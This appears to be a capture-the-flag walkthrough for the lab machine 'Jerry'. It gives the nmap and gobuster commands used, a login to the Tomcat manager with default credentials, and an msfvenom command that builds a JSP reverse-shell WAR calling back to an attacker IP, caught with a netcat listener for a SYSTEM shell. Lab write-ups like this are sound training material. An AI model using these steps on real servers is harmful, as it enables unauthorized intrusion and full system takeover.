Jerry
Enumeration
As usual, we start with an nmap scan, in order to find open ports in the target machine.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.95 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
As we see, port 8080 is the only one that is open. It looks like there is an HTTP service, let's try to obtain more information about the service and version running on that port. The following command will scan port 8080 more in depth and save the result into a file:
nmap -sC -sV -p8080 10.10.10.95 -oN targeted
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.
So we have an Apache Tomcat/Coyote JSP server. If we take a look into the web page with the web browser, we see the Apache default web page.
At this point, I would try to enumerate the web page directories with gobuster.
gobuster dir -u http://10.10.10.95:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200
direnumerates directories or files.-uthe target URL.-wpath to the wordlist.-tnumber of current threads, in this case 200 threads.
Exploitation
If we take a look at the /manager directory, a popup login form appears.
Let's try some random credentials, such as user admin password admin.
We get a 403 Access Denied message. If you look closely, some default credentials appear on a certain line.
Now we have the user tomcat with the password s3cret. Let's refresh the page and enter the default credentials.
If you refresh the page and the 403 message still appears, close the browser and open it again.
And we got in! The next step is to get a reverse shell. If we check out the web page, we could see there is a Deploy section in which we can upload WAR files.
At this point, the idea is to create a WAR payload with msfvenom, upload it to the web page, and get a reverse shell.
msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.14 lport=4444 -f war -o reverse_shell.war
-pindicates the type of payload.lhostlocal host IP.lportlocal port of the listener.-foutput format.-osave the output to a file.
All we have to do is upload the payload and hit Deploy.
Under the Application section, a new row should appear with the path of our uploaded payload.
Finally, all we have to do is set a netcat listener on port 4444 and hit the /reverse_shell path.
nc -lvnp 4444
-llisten mode.-vverbose mode.-nnumeric-only IP, no DNS resolution.-pspecify the port to listen on.
We are already the nt authority\system user, so all we have to do is reap the harvest and get the flags.
Last updated
Was this helpful?